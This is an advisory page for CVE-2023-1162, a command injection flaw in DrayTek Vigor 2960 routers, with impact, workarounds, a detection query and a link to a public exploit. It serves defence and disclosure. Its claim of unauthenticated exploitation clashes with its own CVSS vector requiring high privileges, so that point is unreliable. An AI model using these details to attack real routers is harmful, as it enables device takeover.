CVE-2023-1162 – This is a critical command injection vulnerabil... (How to Fix)

Q: What is the severity of CVE-2023-1162?

CVE-2023-1162 has a CVSS score of 7.2 (HIGH). This is a critical command injection vulnerability in DrayTek Vigor 2960 routers that allows attackers to execute arbitrary commands on the device by manipulating the password parameter in the web management interface. Attackers can exploit this remotely without authentication to gain full control of affected routers. Only products no longer supported by the maintainer are affected.

📋 TL;DR

This is a critical command injection vulnerability in DrayTek Vigor 2960 routers that allows attackers to execute arbitrary commands on the device by manipulating the password parameter in the web management interface. Attackers can exploit this remotely without authentication to gain full control of affected routers. Only products no longer supported by the maintainer are affected.

💻 Affected Systems

Products:

DrayTek Vigor 2960

Versions: 1.5.1.4, 1.5.1.5

Operating Systems: Embedded router firmware

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects products no longer supported by the vendor. The web management interface must be accessible.

📦 What is this software?

Vigor 2960 Firmware by Draytek

View all CVEs affecting Vigor 2960 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to intercept all network traffic, install persistent backdoors, pivot to internal networks, and use the device for further attacks.

🟠

Likely Case

Router takeover leading to network monitoring, credential theft, and potential lateral movement into connected systems.

🟢

If Mitigated

Limited impact if the router is behind firewalls with strict inbound rules and network segmentation prevents lateral movement.

🌐 Internet-Facing: HIGH - The vulnerability is remotely exploitable and public exploits exist for the web interface.

🏢 Internal Only: MEDIUM - Internal attackers or compromised internal systems could exploit this, but requires network access to the management interface.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploit code is publicly available on GitHub. The vulnerability requires no authentication and has simple exploitation vectors.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: N/A

Vendor Advisory: N/A

Restart Required: No

Instructions:

No official patch available as this affects unsupported products. Consider upgrading to supported hardware.

🔧 Temporary Workarounds

Disable Web Management Interface

all

Disable the vulnerable web interface completely to prevent exploitation.

Access router CLI via SSH/Telnet and disable web management interface (specific commands vary by configuration)

Restrict Management Interface Access

all

Limit access to the web management interface to trusted IP addresses only.

Configure firewall rules to restrict access to router management IP/port from specific source IPs

🧯 If You Can't Patch

Replace affected routers with supported models that receive security updates
Implement network segmentation to isolate vulnerable routers from critical systems

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via web interface at System Maintenance > System Information or via CLI command 'show version'

Check Version:

ssh admin@router_ip 'show version' or check web interface System Information page

Verify Fix Applied:

Since no patch exists, verify workarounds by testing that web interface is inaccessible or restricted to authorized IPs only

📡 Detection & Monitoring

Log Indicators:

Unusual command execution in router logs
Multiple failed login attempts followed by successful access
Unexpected configuration changes

Network Indicators:

Unusual outbound connections from router
Traffic to known malicious IPs from router
Unexpected port scans originating from router

SIEM Query:

source="router_logs" AND ("command injection" OR "mainfunction.cgi" OR suspicious shell commands)

📊 Metadata

CVE ID: CVE-2023-1162

CVSS v3 Score: 7.2 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-77

Published: March 3, 2023

Last Updated: November 21, 2024

🔗 References

https://github.com/xxy1126/Vuln/blob/main/Draytek/2.md Exploit
https://vuldb.com/?ctiid.222258 Permissions Required,Third Party Advisory,VDB Entry
https://vuldb.com/?id.222258 Third Party Advisory,VDB Entry
https://github.com/xxy1126/Vuln/blob/main/Draytek/2.md Exploit
https://vuldb.com/?ctiid.222258 Permissions Required,Third Party Advisory,VDB Entry
https://vuldb.com/?id.222258 Third Party Advisory,VDB Entry

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-1162, you might also want to check these: